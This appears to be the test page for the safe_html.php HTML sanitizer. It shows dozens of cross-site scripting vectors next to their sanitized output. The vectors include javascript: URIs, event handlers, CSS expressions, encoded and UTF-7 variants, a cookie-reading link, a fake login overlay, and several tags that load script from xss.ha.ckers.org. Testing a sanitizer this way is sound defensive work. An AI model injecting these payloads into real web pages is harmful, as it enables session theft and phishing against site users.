safe_html.php standard tests

For more documentation, source code, and demonstration see the safe_html.php homepage.

Instructions: In general, if you don’t see any JavaScript alert boxes while viewing this page, and this message is visible, then all tests have been successful. Note that a browser which does not implement a given legacy vector will also show no alert, so compare the green sanitized markup against the red original markup as well.

Text in blue is the rendered HTML as sanitized by safe_html(). Text in red is the original markup. Text in green is the sanitized markup.

Running Tests Now

I think javascript:foo() is the best method.
I think <em>javascript:foo()</em> is the best method.
I think <em>javascript:foo()</em> is the best method.<!-- safe_html.php/0.6 -->

I think you should click this.
I think <a href="javascript:alert(document.cookie);">you should click this</a>.
I think you should click this.

Experiencing technical difficulties, click here to re-try.

<p style="position: absolute; top: 0px; left: 0px;
width: 98%; height: 98%;
background-color: white;">
Experiencing technical difficulties,
<a href="http://10.0.17.128/?action=login">click here to re-try</a>.
</p>
<p >
Experiencing technical difficulties,
<a href="http://10.0.17.128/?action=login">click here to re-try</a>.
</p><!-- safe_html.php/0.6 -->

Let's break all other links!
Let's break <a href="http://google.com/">all other links!
Let's break <a href="http://google.com/">all other links!</a><!-- safe_html.php/0.6 -->

Encoded entities are not javascript.
Encoded entities are not &#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;.
Encoded entities are not &#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;.<!-- safe_html.php/0.6 -->

<IMG src="java<script>:alert(123)" "><SCRIPT>alert("XSS")</SCRIPT>">
<!--xss stripped after processing-->

'';!--"=&{()}
'';!--"<XSS>=&{()}
'';!--"=&{()}<!-- safe_html.php/0.6 -->

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="javascri&#x09;pt:alert('XSS');">

<IMG SRC="javascri&#x0A;pt:alert('XSS');">

<IMG SRC="javascri&#x0D;pt:alert('XSS');">

<IMG
SRC
=
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

<IMG SRC=javascript:alert("XSS")>

alert("XSS")
<SCRIPT>alert("XSS")</SCRIPT>
alert("XSS")<!-- safe_html.php/0.6 -->

<IMG SRC=" javascript:alert('XSS');">

a=/XSS/ alert(a.source)
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
a=/XSS/
alert(a.source)<!-- safe_html.php/0.6 -->

<BODY BACKGROUND="javascript:alert('XSS')">

<img src="/icons/image2.gif" ONLOAD=alert('XSS')>
<img src="/icons/image2.gif" <!-- safe_html.php/0.6 -->

<img src="/icons/image2.gif" oNLoad="alert('XSS')">
<img src="/icons/image2.gif" ><!-- safe_html.php/0.6 -->

<img src="/icons/image2.gif" onload='alert("XSS")' >
<img src="/icons/image2.gif" ><!-- safe_html.php/0.6 -->

<img src="/icons/image2.gif" FSCommand=alert('XSS')>
<img src="/icons/image2.gif" <!-- safe_html.php/0.6 -->

<img src="/icons/image2.gif" seekSegmentTime="alert('XSS')">
<img src="/icons/image2.gif" ><!-- safe_html.php/0.6 -->

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<BGSOUND SRC="javascript:alert('XSS');">


<BR SIZE="&{alert('XSS')}">
<BR SIZE="&{alert('XSS')}"><!-- safe_html.php/0.6 -->

<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
<!-- safe_html.php/0.6 -->

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="mocha:[code]">
<IMG SRC="mocha:[code]"><!-- safe_html.php/0.6 -->

<IMG SRC="livescript:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<IFRAME SRC=javascript:alert('XSS')></IFRAME>

<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="behaviour: url('http://xss.ha.ckers.org/exploit.htc');">
<!-- safe_html.php/0.6 -->

<DIV STYLE="width: expression(alert('XSS'));">
<!-- safe_html.php/0.6 -->

@im\port'\ja\vasc\ript:alert("XSS")';
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
@im\port'\ja\vasc\ript:alert("XSS")';<!-- safe_html.php/0.6 -->

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS')")}</STYLE>
<!-- safe_html.php/0.6 -->

<IMG STYLE='no\xss:noxss("/*");
xss:ex/*XSS*/pression(alert("XSS"))'>
<IMG ><!-- safe_html.php/0.6 -->

alert('XSS');
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
alert('XSS');<!-- safe_html.php/0.6 -->

BODY{background:url("javascript:alert('XSS')")}
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
BODY{background:url("javascript:alert('XSS')")}

<BASE HREF="javascript:alert('XSS');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!-- safe_html.php/0.6 -->

<XML SRC="javascript:alert('XSS');">

<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<!-- safe_html.php/0.6 -->

<IMG SRC="javascript:alert('XSS')"

<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
<!-- safe_html.php/0.6 -->

<? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?>
<!-- safe_html.php/0.6 -->

+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-<!-- safe_html.php/0.6 -->

<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<!-- safe_html.php/0.6 -->

<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<!-- safe_html.php/0.6 -->

<SCRIPT a=">" '' SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<!-- safe_html.php/0.6 -->

<SCRIPT "a='>'" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<!-- safe_html.php/0.6 -->

document.write("
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
document.write("<!-- safe_html.php/0.6 -->

Run the tests again without safe_html() support to see what happens (but don’t blame me if it crashes your browser...)